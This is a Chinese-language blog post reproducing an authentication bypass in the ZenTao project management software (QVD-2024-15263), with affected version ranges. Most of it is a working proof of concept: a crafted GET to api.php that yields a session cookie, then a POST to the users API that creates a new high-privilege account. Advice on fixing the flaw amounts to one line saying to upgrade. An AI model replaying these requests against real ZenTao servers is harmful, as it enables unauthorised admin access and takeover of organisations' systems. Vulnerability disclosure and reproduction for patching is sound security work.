【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

紫色皓月 皓月的笔记本 2024-05-01 20:00

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。

0X01 
简介

禅道由禅道软件（青岛）有限公司开发，国产开源项目管理软件。

漏洞编号：

QVD-2024-15263

影响范围：

1. x <=
   禅道项目管理系统
   <
   18.12
   （开源版）

6
.x <=
禅道项目管理系统
<
8.12
（企业版）

3.x <= 禅道项目管理系统< 4.12（旗舰版）

复现环境：

开源版18.11

0X02 
漏洞复现

GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=&branch= HTTP/1.1
Host: 192.168.31.132

获取zentaosid

POST /zentao/api.php/v1/users HTTP/1.1
Cookie: zentaosid=ceef15d311d3e922b18b29f9203261ad
Host: 192.168.31.132
Content-Length: 92

{"account": "test", "password": "1qaz@WSX", "realname": "test", "role": "top", "group": "1"}
替换获取的zentaosid，提示403账号添加成功。

0X03 修复建议

升级至安全版本及其以上！

0X04 写在最后

回复“加群”，获取群号。

侵删！